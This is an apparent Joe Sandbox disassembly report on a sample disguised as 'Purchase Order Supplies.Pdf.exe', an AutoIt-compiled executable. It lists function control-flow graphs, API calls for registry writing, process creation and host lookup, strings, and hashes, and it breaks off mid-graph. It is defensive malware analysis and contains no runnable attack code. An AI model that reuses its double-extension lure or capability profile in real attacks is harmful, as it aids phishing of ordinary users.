                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 608 c91f04-c91f9c call c92d1a * 2 call c9c935 * 2 call c97e53 call c9d3d2 * 3 625 d02569-d02575 call cb2626 608->625 626 c91fa2-c91fa6 608->626 629 d0257d-d02583 call cce4ea 625->629 628 c91fac-c91faf 626->628 626->629 632 c91fb5-c91fb8 628->632 633 d0258f-d0259b call c9a4f6 628->633 629->633 632->633 634 c91fbe-c91fc7 GetForegroundWindow call c9200a 632->634 640 d025a1-d025b1 call c9a4f6 633->640 641 d02899-d0289d 633->641 639 c91fcc-c91fe3 call c9197e 634->639 651 c91fe4-c92007 call c95cd3 * 3 639->651 640->641 654 d025b7-d025c5 640->654 643 d028ab-d028ae 641->643 644 d0289f-d028a6 call c9c935 641->644 648 d028b0 643->648 649 d028b7-d028c4 643->649 644->643 648->649 652 d028d6-d028da 649->652 653 d028c6-d028d4 call c9b8a7 CharUpperBuffW 649->653 658 d028f1-d028fa 652->658 659 d028dc-d028df 652->659 653->652 657 d025c9-d025e1 call ccd68d 654->657 657->641 673 d025e7-d025f7 call caf885 657->673 660 d0290b EnumWindows 658->660 661 d028fc-d02909 GetDesktopWindow EnumChildWindows 658->661 659->658 665 d028e1-d028ef call c9b8a7 CharUpperBuffW 659->665 667 d02911-d02930 call cce44e call c92d1a 660->667 661->667 665->658 685 d02940 667->685 686 d02932-d0293b call c9200a 667->686 680 d0287b-d0288b call caf885 673->680 681 d025fd-d0260d call caf885 673->681 690 d02873-d02876 680->690 691 d0288d-d02891 680->691 692 d02861-d02871 call caf885 681->692 693 d02613-d02623 call caf885 681->693 686->685 691->651 694 d02897 691->694 692->690 702 d02842-d02848 GetForegroundWindow 692->702 700 d02629-d02639 call caf885 693->700 701 d0281d-d02836 call cd88a2 IsWindow 693->701 697 d02852-d02858 694->697 697->692 711 d02659-d02669 call caf885 700->711 712 d0263b-d02640 700->712 701->651 709 d0283c-d02840 701->709 704 d02849-d02850 call c9200a 702->704 704->697 709->704 719 d0267a-d0268a call caf885 711->719 720 d0266b-d02675 711->720 713 d02646-d02657 call c95cf6 712->713 714 d0280d-d0280f 712->714 724 d0269b-d026a7 call c95be9 713->724 718 d02817-d02818 714->718 718->651 728 d026b5-d026c5 call caf885 719->728 729 d0268c-d02698 call c95cf6 719->729 722 d027e6-d027f0 call c9c935 720->722 733 d02804-d02808 722->733 734 d02811-d02813 724->734 735 d026ad-d026b0 724->735 739 d026e3-d026f3 call caf885 728->739 740 d026c7-d026de call cb2241 728->740 729->724 733->657 734->718 735->733 745 d02711-d02721 call caf885 739->745 746 d026f5-d0270c call cb2241 739->746 740->733 751 d02723-d0273a call cb2241 745->751 752 d0273f-d0274f call caf885 745->752 746->733 751->733 757 d02751-d02768 call cb2241 752->757 758 d0276d-d0277d call caf885 752->758 757->733 763 d02795-d027a5 call caf885 758->763 764 d0277f-d02793 call cb2241 758->764 769 d027c3-d027d3 call caf885 763->769 770 d027a7-d027b7 call caf885 763->770 764->733 776 d027f2-d02802 call ccd614 769->776 777 d027d5-d027da 769->777 770->690 775 d027bd-d027c1 770->775 775->733 776->690 776->733 778 d02815 777->778 779 d027dc-d027e2 777->779 778->718 779->722
                          APIs
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • GetForegroundWindow.USER32 ref: 00C91FBE
                          • IsWindow.USER32(?), ref: 00D0282E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Foreground_memmove
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 3828923867-1919597938
                          • Opcode ID: 92c67e4066610d03b88a4be4249e8e0419d6809aa6dd64f37212b0f9efc920cf
                          • Instruction ID: 3e8c712112652f18eeb1d62f4e7f0dec774f7b414b2abfdb0a95d35c1d836893
                          • Opcode Fuzzy Hash: 92c67e4066610d03b88a4be4249e8e0419d6809aa6dd64f37212b0f9efc920cf
                          • Instruction Fuzzy Hash: 8BD10930105602EBCB04DF50C889BB9BBA1FF55344F588A2DF499576E1CB30E956DBB2
                          Function 00CF352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 782 cf352a-cf3569 call c9d3d2 * 3 789 cf356b-cf356e 782->789 790 cf3574-cf35e7 call c984a6 call cf3d7b call cf3af7 782->790 789->790 791 cf35f9-cf360d call ca2570 789->791 804 cf35e9-cf35f4 call cdd7e4 790->804 805 cf3612-cf3617 790->805 797 cf3a94-cf3ab7 call c95cd3 * 3 791->797 804->791 806 cf366d 805->806 807 cf3619-cf362e RegConnectRegistryW 805->807 812 cf3671-cf369c RegCreateKeyExW 806->812 810 cf3667-cf366b 807->810 811 cf3630-cf3662 call c97ba9 call cdd7e4 call ca2570 807->811 810->812 811->797 815 cf369e-cf36d2 call c97ba9 call cdd7e4 call ca2570 812->815 816 cf36e7-cf36ec 812->816 815->797 838 cf36d8-cf36e2 RegCloseKey 815->838 820 cf3a7b-cf3a8c RegCloseKey 816->820 821 cf36f2-cf3715 call c984a6 call cb1bc7 816->821 820->797 824 cf3a8e-cf3a92 RegCloseKey 820->824 836 cf3717-cf376d call c984a6 call cb18fb call c984a6 * 2 RegSetValueExW 821->836 837 cf3796-cf37b6 call c984a6 call cb1bc7 821->837 824->797 836->820 861 cf3773-cf3791 call c97ba9 call ca2570 836->861 847 cf37bc-cf3814 call c984a6 call cb18fb call c984a6 * 2 RegSetValueExW 837->847 848 cf3840-cf3860 call c984a6 call cb1bc7 837->848 838->797 847->820 880 cf381a-cf383b call c97ba9 call ca2570 847->880 862 cf3949-cf3969 call c984a6 call cb1bc7 848->862 863 cf3866-cf38c9 call c984a6 call cb010a call c984a6 call c93b1e 848->863 881 cf3a74 861->881 882 cf396b-cf398b call c9cdb4 call c984a6 862->882 883 cf39c6-cf39e6 call c984a6 call cb1bc7 862->883 900 cf38cb-cf38d0 863->900 901 cf38e9-cf3918 call c984a6 RegSetValueExW 863->901 880->820 881->820 905 cf398d-cf39a1 RegSetValueExW 882->905 902 cf39e8-cf3a0e call c9d00b call c984a6 883->902 903 cf3a13-cf3a30 call c984a6 call cb1bc7 883->903 906 cf38d8-cf38db 900->906 907 cf38d2-cf38d4 900->907 915 cf393d-cf3944 call cb017e 901->915 916 cf391a-cf3936 call c97ba9 call ca2570 901->916 902->905 930 cf3a67-cf3a71 call ca2570 903->930 931 cf3a32-cf3a60 call cdbe47 call c984a6 call cdbe8a 903->931 905->820 911 cf39a7-cf39c1 call c97ba9 call ca2570 905->911 906->900 912 cf38dd-cf38df 906->912 907->906 911->881 912->901 913 cf38e1-cf38e5 912->913 913->901 915->820 916->915 930->881 931->930
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF3626
                          • RegCreateKeyExW.KERNEL32(?,?,00000000,00D2DBF0,00000000,?,00000000,?,?), ref: 00CF3694
                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CF36DC
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CF3765
                          • RegCloseKey.ADVAPI32(?), ref: 00CF3A85
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF3A92
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Close$ConnectCreateRegistryValue
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 536824911-966354055
                          • Opcode ID: f48691b7191c3dce999eeaa95265839394aa24dc271fcfd53149771d2f0d577a
                          • Instruction ID: c77acf3c8651c3a03052b63405c0436e0695384a17db1f141dca0e4d6c65d640
                          • Opcode Fuzzy Hash: f48691b7191c3dce999eeaa95265839394aa24dc271fcfd53149771d2f0d577a
                          • Instruction Fuzzy Hash: 9302AF75200601AFCB14EF15C895E2AB7E5FF89320F05845DF99AAB361DB34EE05DB82
                          Function 00C94257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,00000000,00000001,00000000), ref: 00C9428C
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00CB1BC7: __wcsicmp_l.LIBCMT ref: 00CB1C50
                          • _wcscpy.LIBCMT ref: 00C943C0
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00D0214E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe$CMDLINE$CMDLINERAW
                          • API String ID: 861526374-98412462
                          • Opcode ID: f55f4fc1733bc1d7d65901daab0efd7239073d2a52ed517359489725dca4f4c4
                          • Instruction ID: 9d542a26cfb9bec65e848faba2134a248c36e406465007ede7bf01fa817a771e
                          • Opcode Fuzzy Hash: f55f4fc1733bc1d7d65901daab0efd7239073d2a52ed517359489725dca4f4c4
                          • Instruction Fuzzy Hash: 1881A276800219AACF05EBE0CD5AEEFB7B8AF15754F500015F941B7191EF60AB09DBB1
                          Function 00CD78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1094 cd78ee-cd7911 WSAStartup 1095 cd7917-cd7938 gethostname gethostbyname 1094->1095 1096 cd79b1-cd79bd call cb1943 1094->1096 1095->1096 1098 cd793a-cd7941 1095->1098 1104 cd79be-cd79c1 1096->1104 1100 cd794e-cd7950 1098->1100 1101 cd7943 1098->1101 1102 cd7961-cd79a6 call cafaa0 inet_ntoa call cb3220 call cd8553 call cb1943 call cb017e 1100->1102 1103 cd7952-cd795f call cb1943 1100->1103 1105 cd7945-cd794c 1101->1105 1110 cd79a9-cd79af WSACleanup 1102->1110 1103->1110 1105->1100 1105->1105 1110->1104
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 208665112-3771769585
                          • Opcode ID: 55867da61937ac6546016e7bd0c21b5836ac3aae27e49b272d5906a1e2152a8c
                          • Instruction ID: 19370c2ecc79c1b2ee91c20ec2ca49cac3924787406a63caef361db4346dd0ce
                          • Opcode Fuzzy Hash: 55867da61937ac6546016e7bd0c21b5836ac3aae27e49b272d5906a1e2152a8c
                          • Instruction Fuzzy Hash: 9C112732908215BFDB24AB709C56EEE337CDF00720F04016AF556D2291FF70DB8196A0
                          Function 00CAE975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CAEA39
                          • __wsplitpath.LIBCMT ref: 00CAEA56
                            • Part of subcall function 00CB297D: __wsplitpath_helper.LIBCMT ref: 00CB29BD
                          • _wcsncat.LIBCMT ref: 00CAEA69
                          • __makepath.LIBCMT ref: 00CAEA85
                            • Part of subcall function 00CB2BFF: __wmakepath_s.LIBCMT ref: 00CB2C13
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                          • _wcscpy.LIBCMT ref: 00CAEABE
                            • Part of subcall function 00CAEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00CAEADA,?,?), ref: 00CAEB27
                          • _wcscat.LIBCMT ref: 00D032FC
                          • _wcscat.LIBCMT ref: 00D03334
                          • _wcsncpy.LIBCMT ref: 00D03370
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                          • String ID: Include$\
                          • API String ID: 1213536620-3429789819
                          • Opcode ID: 2edb9c3994dc6339781bececf260734f503521467b2fa0b34472c5552180a19c
                          • Instruction ID: 7b220485bc0f93167ed39c406b24f23dd93d98c67402019301346dfbbf815394
                          • Opcode Fuzzy Hash: 2edb9c3994dc6339781bececf260734f503521467b2fa0b34472c5552180a19c
                          • Instruction Fuzzy Hash: F7517CB24043409BD715EF64EC858AAB7F8FB4A301F40491EF949C3361EB749648DB76
                          Function 00C930A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00C930B0
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00C930BF
                          • LoadIconW.USER32(00000063), ref: 00C930D5
                          • LoadIconW.USER32(000000A4), ref: 00C930E7
                          • LoadIconW.USER32(000000A2), ref: 00C930F9
                            • Part of subcall function 00C9318A: LoadImageW.USER32(00C90000,00000063,00000001,00000010,00000010,00000000), ref: 00C931AE
                          • RegisterClassExW.USER32(?), ref: 00C93167
                            • Part of subcall function 00C92F58: GetSysColorBrush.USER32(0000000F), ref: 00C92F8B
                            • Part of subcall function 00C92F58: RegisterClassExW.USER32(00000030), ref: 00C92FB5
                            • Part of subcall function 00C92F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C92FC6
                            • Part of subcall function 00C92F58: LoadIconW.USER32(000000A9), ref: 00C93009
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                          • String ID: #$0$AutoIt v3
                          • API String ID: 2880975755-4155596026
                          • Opcode ID: bdf6710ba932dcddc7d963cfeb12a4e6b107a83b8eba79d32d394c0d503c63d0
                          • Instruction ID: 5ca17c3f1b03ff71b85b9f64c419f67952647c9cd7ae865ab60c4533acb82f4f
                          • Opcode Fuzzy Hash: bdf6710ba932dcddc7d963cfeb12a4e6b107a83b8eba79d32d394c0d503c63d0
                          • Instruction Fuzzy Hash: 82213EB4D40314ABDB00DFA9EC49B9DBBF5EB48311F00816AEA14E23E0D7754544CFA1
                          Function 00CEB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1342 ceb74b-ceb7ac VariantInit call c9ca8e CoInitialize 1345 ceb7ae CoUninitialize 1342->1345 1346 ceb7b4-ceb7c7 call cad5f6 1342->1346 1345->1346 1349 ceb7c9-ceb7d0 call c9ca8e 1346->1349 1350 ceb7d5-ceb7dc 1346->1350 1349->1350 1352 ceb7de-ceb805 call c984a6 call cca857 1350->1352 1353 ceb81b-ceb85b call c984a6 call caf885 1350->1353 1352->1353 1364 ceb807-ceb816 call cec235 1352->1364 1362 ceb9d3-ceba17 SetErrorMode CoGetInstanceFromFile 1353->1362 1363 ceb861-ceb86e 1353->1363 1367 ceba1f-ceba3a CoGetObject 1362->1367 1368 ceba19-ceba1d 1362->1368 1365 ceb8a8-ceb8b6 GetRunningObjectTable 1363->1365 1366 ceb870-ceb881 call cad5f6 1363->1366 1381 cebad0-cebae3 VariantClear 1364->1381 1370 ceb8b8-ceb8c9 1365->1370 1371 ceb8d5-ceb8e8 call cec235 1365->1371 1384 ceb883-ceb88d call c9cdb4 1366->1384 1385 ceb8a0 1366->1385 1374 ceba3c 1367->1374 1375 cebab5-cebac5 call cec235 SetErrorMode 1367->1375 1373 ceba40-ceba47 SetErrorMode 1368->1373 1389 ceb8ed-ceb8fc 1370->1389 1390 ceb8cb-ceb8d0 1370->1390 1391 cebac7-cebacb call c95cd3 1371->1391 1380 ceba4b-ceba51 1373->1380 1374->1373 1375->1391 1387 cebaa8-cebaab 1380->1387 1388 ceba53-ceba55 1380->1388 1384->1385 1402 ceb88f-ceb89e call c9cdb4 1384->1402 1385->1365 1387->1375 1393 ceba8d-cebaa6 call cda6f6 1388->1393 1394 ceba57-ceba78 call ccac4b 1388->1394 1401 ceb907-ceb91b 1389->1401 1390->1371 1391->1381 1393->1391 1394->1393 1403 ceba7a-ceba83 1394->1403 1408 ceb9bb-ceb9d1 1401->1408 1409 ceb921-ceb925 1401->1409 1402->1365 1403->1393 1408->1380 1409->1408 1410 ceb92b-ceb940 1409->1410 1413 ceb9a2-ceb9ac 1410->1413 1414 ceb942-ceb957 1410->1414 1413->1401 1414->1413 1418 ceb959-ceb983 call ccac4b 1414->1418 1422 ceb994-ceb99e 1418->1422 1423 ceb985-ceb98d 1418->1423 1422->1413 1424 ceb98f-ceb990 1423->1424 1425 ceb9b1-ceb9b6 1423->1425 1424->1422 1425->1408
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00CEB777
                          • CoInitialize.OLE32(00000000), ref: 00CEB7A4
                          • CoUninitialize.COMBASE ref: 00CEB7AE
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00CEB8AE
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CEB9DB
                          • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00CEBA0F
                          • CoGetObject.OLE32(?,00000000,00D1D91C,?), ref: 00CEBA32
                          • SetErrorMode.KERNEL32(00000000), ref: 00CEBA45
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CEBAC5
                          • VariantClear.OLEAUT32(00D1D91C), ref: 00CEBAD5
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                          • String ID:
                          • API String ID: 2395222682-0
                          • Opcode ID: 3605e77a03535a02f989c0951091ec587321890f523902eddcfd4536e606fafc
                          • Instruction ID: e14ad6e97201d249553992034b57fa4f85cecb02fe679b6582cb5951ab8bcd38
                          • Opcode Fuzzy Hash: 3605e77a03535a02f989c0951091ec587321890f523902eddcfd4536e606fafc
                          • Instruction Fuzzy Hash: BAC12371604345AFC700DF69C88496BB7E9BF89308F00491DF59ADB251DB71ED46CB62
                          Function 00C92F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00C92F8B
                          • RegisterClassExW.USER32(00000030), ref: 00C92FB5
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C92FC6
                          • LoadIconW.USER32(000000A9), ref: 00C93009
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 975902462-1005189915
                          • Opcode ID: 18f4a13afbc7bfd6c88c9f1f8f5a58bbb5390a8d5deb87c2d6110aae3242140f
                          • Instruction ID: f17cb89e26386d96ea2642ac745846a222e9ca721c6595b279a2922820aecf2e
                          • Opcode Fuzzy Hash: 18f4a13afbc7bfd6c88c9f1f8f5a58bbb5390a8d5deb87c2d6110aae3242140f
                          • Instruction Fuzzy Hash: A521A0B9900319AFDB109FA4E849BCEBBB5FB08705F10811AFA15E63A0DBB44545CFA1
                          Function 00CF23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1431 cf23c5-cf2426 call cb1970 1434 cf2428-cf243b call c9cdb4 1431->1434 1435 cf2452-cf2456 1431->1435 1443 cf243d-cf2450 call c9cdb4 1434->1443 1444 cf2488 1434->1444 1436 cf249d-cf24a3 1435->1436 1437 cf2458-cf2468 call c9cdb4 1435->1437 1440 cf24b8-cf24be 1436->1440 1441 cf24a5-cf24a8 1436->1441 1452 cf246b-cf2484 call c9cdb4 1437->1452 1446 cf24c8-cf24e2 call c984a6 call c93bcf 1440->1446 1447 cf24c0 1440->1447 1445 cf24ab-cf24b0 call c9cdb4 1441->1445 1443->1452 1453 cf248b-cf248f 1444->1453 1445->1440 1464 cf24e8-cf2541 call c984a6 call c93bcf call c984a6 call c93bcf call c984a6 call c93bcf 1446->1464 1465 cf25a1-cf25a9 1446->1465 1447->1446 1452->1436 1463 cf2486 1452->1463 1458 cf2499-cf249b 1453->1458 1459 cf2491-cf2497 1453->1459 1458->1436 1458->1440 1459->1445 1463->1453 1511 cf256f-cf259f GetSystemDirectoryW call cb010a GetSystemDirectoryW 1464->1511 1512 cf2543-cf255e call c984a6 call c93bcf 1464->1512 1466 cf25ab-cf25c6 call c984a6 call c93bcf 1465->1466 1467 cf25d3-cf2601 GetCurrentDirectoryW call cb010a GetCurrentDirectoryW 1465->1467 1466->1467 1484 cf25c8-cf25d1 call cb18fb 1466->1484 1475 cf2605 1467->1475 1478 cf2609-cf260d 1475->1478 1481 cf260f-cf2639 call c9ca8e * 3 1478->1481 1482 cf263e-cf264e call cd9a8f 1478->1482 1481->1482 1495 cf26aa 1482->1495 1496 cf2650-cf269b call cda17a call cda073 call cda102 1482->1496 1484->1467 1484->1482 1497 cf26ac-cf26bb 1495->1497 1496->1497 1525 cf269d-cf26a8 1496->1525 1501 cf274c-cf2768 CreateProcessW 1497->1501 1502 cf26c1-cf26f1 call ccbc90 call cb18fb 1497->1502 1508 cf276b-cf277e call cb017e * 2 1501->1508 1526 cf26fa-cf270a call cb18fb 1502->1526 1527 cf26f3-cf26f8 1502->1527 1530 cf27bd-cf27c9 CloseHandle 1508->1530 1531 cf2780-cf27b8 call cdd7e4 GetLastError call c97ba9 call ca2570 1508->1531 1511->1475 1512->1511 1538 cf2560-cf2569 call cb18fb 1512->1538 1525->1497 1541 cf270c-cf2711 1526->1541 1542 cf2713-cf2723 call cb18fb 1526->1542 1527->1526 1527->1527 1535 cf27cb-cf27f0 call cd9d09 call cda37f call cf2881 1530->1535 1536 cf27f5-cf27f9 1530->1536 1547 cf283e-cf284f call cd9b29 1531->1547 1535->1536 1543 cf27fb-cf2805 1536->1543 1544 cf2807-cf2811 1536->1544 1538->1478 1538->1511 1541->1541 1541->1542 1558 